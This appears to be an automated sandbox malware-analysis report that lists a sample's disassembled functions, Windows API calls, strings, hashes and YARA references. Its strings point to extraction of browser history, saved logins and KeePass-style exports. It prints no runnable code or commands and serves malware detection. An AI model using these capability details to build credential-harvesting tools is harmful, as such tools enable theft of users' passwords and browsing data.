                          • API String ID: 2000436516-3842416460
                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                          Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                          • String ID:
                          • API String ID: 1043902810-0
                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                          Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                          • memset.MSVCRT ref: 0040E380
                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                          • wcschr.MSVCRT ref: 0040E3B8
                          • memcpy.MSVCRT ref: 0040E3EC
                          • memcpy.MSVCRT ref: 0040E407
                          • memcpy.MSVCRT ref: 0040E422
                          • memcpy.MSVCRT ref: 0040E43D
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                          • API String ID: 3073804840-2252543386
                          • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                          • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                          Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@_snwprintfwcscpy
                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                          • API String ID: 2899246560-1542517562
                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                          Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                          • String ID:
                          • API String ID: 3715365532-3916222277
                          • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                          • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                          Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040DBCD
                          • memset.MSVCRT ref: 0040DBE9
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                          • wcscpy.MSVCRT ref: 0040DC2D
                          • wcscpy.MSVCRT ref: 0040DC3C
                          • wcscpy.MSVCRT ref: 0040DC4C
                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                          • wcscpy.MSVCRT ref: 0040DCC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                          • API String ID: 3330709923-517860148
                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                          Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                          • memset.MSVCRT ref: 0040806A
                          • memset.MSVCRT ref: 0040807F
                          • _wtoi.MSVCRT ref: 004081AF
                          • _wcsicmp.MSVCRT ref: 004081C3
                          • memset.MSVCRT ref: 004081E4
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                          • String ID: logins$null
                          • API String ID: 2148543256-2163367763
                          • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                          • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                          Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          • memset.MSVCRT ref: 004085CF
                          • memset.MSVCRT ref: 004085F1
                          • memset.MSVCRT ref: 00408606
                          • strcmp.MSVCRT ref: 00408645
                          • _mbscpy.MSVCRT ref: 004086DB
                          • _mbscpy.MSVCRT ref: 004086FA
                          • memset.MSVCRT ref: 0040870E
                          • strcmp.MSVCRT ref: 0040876B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                          • CloseHandle.KERNEL32(?), ref: 004087A6
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                          • String ID: ---
                          • API String ID: 3437578500-2854292027
                          • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                          • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                          Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0041087D
                          • memset.MSVCRT ref: 00410892
                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                          • GetSysColor.USER32(0000000F), ref: 00410999
                          • DeleteObject.GDI32(?), ref: 004109D0
                          • DeleteObject.GDI32(?), ref: 004109D6
                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                          • String ID:
                          • API String ID: 1010922700-0
                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                          Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                          • malloc.MSVCRT ref: 004186B7
                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                          • malloc.MSVCRT ref: 004186FE
                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$FullNamePath$malloc$Version
                          • String ID: |A
                          • API String ID: 4233704886-1717621600
                          • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                          • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                          Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                          • API String ID: 2081463915-1959339147
                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                          Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,7570CFBC,?,00413396), ref: 004138ED
                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                          • API String ID: 2012295524-70141382
                          • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                          • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                          Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 00413865
                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                          • API String ID: 667068680-3953557276
                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                          Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 004121FF
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                          • SelectObject.GDI32(?,?), ref: 00412251
                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                          • SetCursor.USER32(00000000), ref: 004122BC
                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                          • memcpy.MSVCRT ref: 0041234D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                          • String ID:
                          • API String ID: 1700100422-0
                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                          Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 004111E0
                          • GetWindowRect.USER32(?,?), ref: 004111F6
                          • GetWindowRect.USER32(?,?), ref: 0041120C
                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                          • GetWindowRect.USER32(00000000), ref: 0041124D
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                          • String ID:
                          • API String ID: 552707033-0
                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                          Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                          • memcpy.MSVCRT ref: 0040C11B
                          • strchr.MSVCRT ref: 0040C140
                          • strchr.MSVCRT ref: 0040C151
                          • _strlwr.MSVCRT ref: 0040C15F
                          • memset.MSVCRT ref: 0040C17A
                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                          • String ID: 4$h
                          • API String ID: 4066021378-1856150674
                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                          Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_snwprintf
                          • String ID: %%0.%df
                          • API String ID: 3473751417-763548558
                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
